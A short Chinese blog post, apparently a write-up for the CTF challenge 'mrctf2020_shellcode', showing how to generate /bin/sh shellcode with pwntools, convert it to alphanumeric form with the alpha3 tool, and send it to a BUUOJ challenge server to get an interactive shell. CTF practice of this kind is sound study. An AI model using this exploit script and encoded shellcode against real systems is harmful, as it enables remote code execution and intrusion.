mrctf2020_shellcode

很牛啊,这道题,我看别的师傅的博客才知道这是可视化的shellcode,但是我的文件我搞不来无法找到可视化的范围。
但是攻击已经实现了。
从不可视的shellcode变成可视化的shellcode要用一个工具alpha3。下面这个语句就好了。

git clone https://github.com/TaQini/alpha3.git

点击查看代码
from pwn import *
context.arch="amd64"
f = open('sc.bin','wb')
f.write(asm(shellcraft.sh()))
f.close()

先生成一个普通的shellcode文件,然后放到alpha3文件里 再运行这句 python ./ALPHA3.py x64 ascii mixedcase rax --input="sc.bin" 就可以出现一串可视化的shellcode,然后直接打就好了
点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",29065)
shellcode='Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070tgia'
payload=shellcode
io.sendline(payload)
io.interactive()

posted @ 2022-07-02 16:58  REPWNER  阅读(71)  评论(0)    收藏  举报